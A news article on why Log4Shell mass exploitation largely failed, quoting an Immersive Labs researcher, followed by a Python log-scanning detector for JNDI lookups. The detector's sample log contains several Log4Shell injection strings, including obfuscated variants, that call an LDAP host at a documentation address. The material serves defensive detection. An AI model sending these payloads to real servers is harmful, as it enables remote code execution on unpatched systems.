Log4Shell – why mass exploitation failed and the lessons that can be learned from those who tried
The impact of the Log4Shell bug – which threatened to wreak havoc on businesses worldwide when it was first discovered in December – has been limited thanks to the swift reaction of the industry as well as the code being harder for criminals to exploit than was first anticipated.
Before Christmas, a vulnerability in Apache’s widely used Java-based logging utility Log4J – which was dubbed Log4Shell – sent the industry into a tailspin.
Yet mass exploitation of the bug appears to have failed, with one of the few reported exceptions being the VMware Horizon servers used by the NHS.
According to Kev Breen, director of cyber threat research at Immersive Labs, while there has been “a lot of noise” and plenty of opportunist, scatter-gun attacks exploiting the vulnerability, fortunately for businesses there have been very few successful ones.
Breen believes that the reason for this is twofold. Firstly, enterprises took swift action: security teams worked weekends to install patches, which mitigated exploitation attempts.
“Our response to Log4Shell as an industry was swift. And most SaaS suppliers will have had emails from their customers asking them to provide formal legal statements on exactly where, how and if they are looking for the Log4Shell bug. So that unified response will have played a part in it not having had a wider impact,” Breen explains.
Another reason for the lack of wide-scale breaches, he adds, is the unanticipated complexity involved in using the vulnerability to attack firms.
“The more we get into how this vulnerability works, the specific remote code execution side of this, which is the thing that the attackers really wanted – it was a bit more complex than people thought.”
“On the surface it felt like a really simple, trivial vulnerability to exploit. And in part that’s true. But to actually gain code execution, you had to be very familiar with the application that you’re targeting. And opportunist attackers don’t really have that kind of visibility,” says Breen.
Attempted breaches – key learnings
Breen adds that detection tools for the Log4Shell bug were released within hours of it first being reported, and that these have been phenomenally successful in picking up attempted attacks, which the whole cyber security community can learn from.
Security solutions firm Sophos released a blog this week which analysed the types of attacks the industry was seeing from Log4Shell.
The data reveals that many of the initial vulnerability scans and subsequent proof-of-concept attempts were coming from opportunist, financially motivated crypto miners who write automated scripting tooling and aim it at every IP address and port they can find.
“If we look back over the last year crypto miners have tried to exploit all major vulnerabilities that we’ve seen including SaltStack and MS Exchange. They write a lot of automated scripting tools and just point it at the Internet and go. So it’s not targeted and it’s low effort for them. The success rate is low but the yield is high.”
According to Breen, the good news is that the crypto miners’ scatter-gun approach is actually useful for the security community, in terms of helping them understand attackers’ behaviour.
“It generates a wealth of information for us. We live in our bubble and know how we would modify things, but we don’t necessarily know how attackers think all the time. Now we can look at their approach and the tricks they use and this can help us write new detections.”
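The detection tools Breen refers to work by spotting the JNDI lookup string in incoming requests, including the nested-lookup variants that the scatter-gun scanners used to slip past naive pattern matching. The following is an added example, not code from Sophos, Immersive Labs or the Log4j project: it unrolls Log4j-style `${...}` lookups in constructed web-server log lines before matching, so that the obfuscated forms and the plain form are caught alike.

```python
import re

# Innermost Log4j-style lookup "${func:arg}" (no nested braces inside arg).
# Only the lookup forms commonly seen in public Log4Shell scanning traffic
# are handled: lower/upper case conversion and the ":-default" fallback.
_INNER_LOOKUP = re.compile(r"\$\{([A-Za-z]*):([^{}]*)\}")
_MAX_ROUNDS = 20  # bound the unrolling so a hostile line cannot spin us

def _resolve(match):
    """Collapse one innermost lookup; leave unknown lookups untouched."""
    func, arg = match.group(1).lower(), match.group(2)
    if ":-" in arg:  # "${x:y:-default}" and "${::-default}" yield default
        return arg.split(":-", 1)[1]
    if func == "lower":
        return arg.lower()
    if func == "upper":
        return arg.upper()
    return match.group(0)  # e.g. "${jndi:...}" itself stays for matching

def normalise(line):
    """Repeatedly unroll nested lookups until the line stops changing."""
    for _ in range(_MAX_ROUNDS):
        new = _INNER_LOOKUP.sub(_resolve, line)
        if new == line:
            break
        line = new
    return line

_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def is_jndi_probe(line):
    return bool(_JNDI.search(normalise(line)))

def scan(lines):
    """Return indices of lines that carry a JNDI lookup after normalisation."""
    return [i for i, ln in enumerate(lines) if is_jndi_probe(ln)]

# Constructed sample log lines (203.0.113.0/24 is documentation address space).
SAMPLE_LOG = [
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.9/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.9/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:${env:NOPE:-l}dap://203.0.113.9/a}"',
    '203.0.113.11 - - "GET /?d=${date:yyyy} HTTP/1.1" 404 "curl/7.79"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print(i, normalise(SAMPLE_LOG[i]))
```

Lines 1 to 4 of the sample are flagged and line 5, which contains a harmless non-JNDI lookup, is not; a production detector would additionally cover other obfuscation forms, so treat this as a starting point rather than a complete rule.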